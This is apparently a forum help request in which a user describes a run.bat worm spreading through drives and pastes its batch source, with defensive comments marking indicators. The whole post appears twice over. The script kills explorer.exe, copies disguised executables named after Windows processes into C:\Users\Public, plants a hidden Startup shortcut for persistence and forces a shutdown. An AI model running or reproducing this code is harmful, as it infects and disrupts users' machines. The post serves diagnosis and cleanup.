All my folders are getting converted into system folders due to a virus named run.bat. It is undetectable by antivirus programs. Its code is as follows:
REM run.bat as posted: stages files from the current directory into
REM C:\Users\Public, plants a shortcut in the per-user Startup folder and then
REM forces a shutdown. Paths and file names below are useful indicators when
REM checking a machine or a removable drive.
REM
REM Replaces PATH for this session with System32 only.
path C:\Windows\System32
REM Console colours: bright-white background (f), light-green text (a).
color fa
REM Staging. Each line skips the copy when the file is already in
REM C:\Users\Public (the bare ECHO only prints the echo state); otherwise xcopy
REM copies it there, /h including hidden and system files and /y suppressing
REM the overwrite prompt. The first line also force-kills explorer.exe before
REM copying.
REM NOTE(review): several names carry a space before the extension
REM ("smss .exe", "taskeng .exe", "explorer .exe", "Firewall .exe") and imitate
REM Windows process names; the genuine smss.exe, taskeng.exe and explorer.exe
REM live under the Windows directory, not C:\Users\Public, so any of these
REM names in that folder is a strong indicator.
IF EXIST "C:\Users\Public\smss .exe" ( ECHO ) ELSE (taskkill /f /im explorer.exe
xcopy /h /y "smss .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\taskeng .exe" ( ECHO ) ELSE (xcopy /h /y "taskeng .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall.exe" ( ECHO ) ELSE (xcopy /h /y "Firewall.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall .exe" ( ECHO ) ELSE (xcopy /h /y "Firewall .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer.exe" ( ECHO ) ELSE (xcopy /h /y "explorer.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer .exe" ( ECHO ) ELSE (xcopy /h /y "explorer .exe" "C:\Users\Public")
REM Interop.IWshRuntimeLibrary.dll is normally a .NET interop assembly for the
REM Windows Script Host object model; presumably the executables use it to
REM create shortcuts - not shown here, confirm by analysing the binaries.
IF EXIST "C:\Users\Public\Interop.IWshRuntimeLibrary.dll" ( ECHO ) ELSE (xcopy /h /y Interop.IWshRuntimeLibrary.dll "C:\Users\Public")
REM Branch on the installed .NET Framework directory. v3.* is tested first, so
REM it wins when both exist; when neither exists execution falls through into
REM label 3 as well.
IF EXIST "%systemroot%\Microsoft.NET\Framework\v3.*" goto 3
IF EXIST "%systemroot%\Microsoft.NET\Framework\v4.*" goto 4
:3
REM Persistence through the per-user Startup folder. If Sound_Driver.lnk is not
REM there yet: clear hidden/system on the local copy, copy it into Startup,
REM re-hide the local copy, clear hidden/system on the Startup copy, then force
REM an immediate power-off (/s /f /t 0). Anything in Startup runs at the next
REM logon; the shortcut's target is not visible in this script.
REM NOTE(review): the attributes are presumably cleared first because copy does
REM not pick up hidden or system files - confirm.
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Driver.lnk" -h -s
copy /y Sound_Driver.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Driver.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" -h -s
shutdown /s /f /t 0
)
goto e
:4
REM Same persistence step for the v4.* branch, using Sound_Drivers.lnk.
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Drivers.lnk" -h -s
copy /y Sound_Drivers.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Drivers.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" -h -s
shutdown /s /f /t 0
)
REM End of script. Cleanup note: deleting run.bat alone leaves the staged
REM copies in C:\Users\Public and the Startup shortcut in place; both locations
REM need checking, preferably with the staged executables not running.
:e
It automatically creates some files named smss.exe, invis.vbs, New folder.bat, a shortcut named new folder, sound_driver, sound_drivers, and an application extension file named Interop.IWshRuntimeLibrary.dll. I tried deleting these but was not successful, as after the deletion they reappear on their own. These files are also created when I plug in an external drive, and it also turns normal folders into system folders automatically. These files are found on each drive I have.
REM run.bat as posted: stages files from the current directory into
REM C:\Users\Public, plants a shortcut in the per-user Startup folder and then
REM forces a shutdown. Paths and file names below are useful indicators when
REM checking a machine or a removable drive.
REM
REM Replaces PATH for this session with System32 only.
path C:\Windows\System32
REM Console colours: bright-white background (f), light-green text (a).
color fa
REM Staging. Each line skips the copy when the file is already in
REM C:\Users\Public (the bare ECHO only prints the echo state); otherwise xcopy
REM copies it there, /h including hidden and system files and /y suppressing
REM the overwrite prompt. The first line also force-kills explorer.exe before
REM copying.
REM NOTE(review): several names carry a space before the extension
REM ("smss .exe", "taskeng .exe", "explorer .exe", "Firewall .exe") and imitate
REM Windows process names; the genuine smss.exe, taskeng.exe and explorer.exe
REM live under the Windows directory, not C:\Users\Public, so any of these
REM names in that folder is a strong indicator.
IF EXIST "C:\Users\Public\smss .exe" ( ECHO ) ELSE (taskkill /f /im explorer.exe
xcopy /h /y "smss .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\taskeng .exe" ( ECHO ) ELSE (xcopy /h /y "taskeng .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall.exe" ( ECHO ) ELSE (xcopy /h /y "Firewall.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall .exe" ( ECHO ) ELSE (xcopy /h /y "Firewall .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer.exe" ( ECHO ) ELSE (xcopy /h /y "explorer.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer .exe" ( ECHO ) ELSE (xcopy /h /y "explorer .exe" "C:\Users\Public")
REM Interop.IWshRuntimeLibrary.dll is normally a .NET interop assembly for the
REM Windows Script Host object model; presumably the executables use it to
REM create shortcuts - not shown here, confirm by analysing the binaries.
IF EXIST "C:\Users\Public\Interop.IWshRuntimeLibrary.dll" ( ECHO ) ELSE (xcopy /h /y Interop.IWshRuntimeLibrary.dll "C:\Users\Public")
REM Branch on the installed .NET Framework directory. v3.* is tested first, so
REM it wins when both exist; when neither exists execution falls through into
REM label 3 as well.
IF EXIST "%systemroot%\Microsoft.NET\Framework\v3.*" goto 3
IF EXIST "%systemroot%\Microsoft.NET\Framework\v4.*" goto 4
:3
REM Persistence through the per-user Startup folder. If Sound_Driver.lnk is not
REM there yet: clear hidden/system on the local copy, copy it into Startup,
REM re-hide the local copy, clear hidden/system on the Startup copy, then force
REM an immediate power-off (/s /f /t 0). Anything in Startup runs at the next
REM logon; the shortcut's target is not visible in this script.
REM NOTE(review): the attributes are presumably cleared first because copy does
REM not pick up hidden or system files - confirm.
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Driver.lnk" -h -s
copy /y Sound_Driver.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Driver.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" -h -s
shutdown /s /f /t 0
)
goto e
:4
REM Same persistence step for the v4.* branch, using Sound_Drivers.lnk.
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Drivers.lnk" -h -s
copy /y Sound_Drivers.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Drivers.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" -h -s
shutdown /s /f /t 0
)
REM End of script. Cleanup note: deleting run.bat alone leaves the staged
REM copies in C:\Users\Public and the Startup shortcut in place; both locations
REM need checking, preferably with the staged executables not running.
:e
It automatically creates some files named smss.exe, invis.vbs, New folder.bat, a shortcut named new folder, sound_driver, sound_drivers, and an application extension file named Interop.IWshRuntimeLibrary.dll. I tried deleting these but was not successful, as after the deletion they reappear on their own. These files are also created when I plug in an external drive, and it also turns normal folders into system folders automatically. These files are found on each drive I have.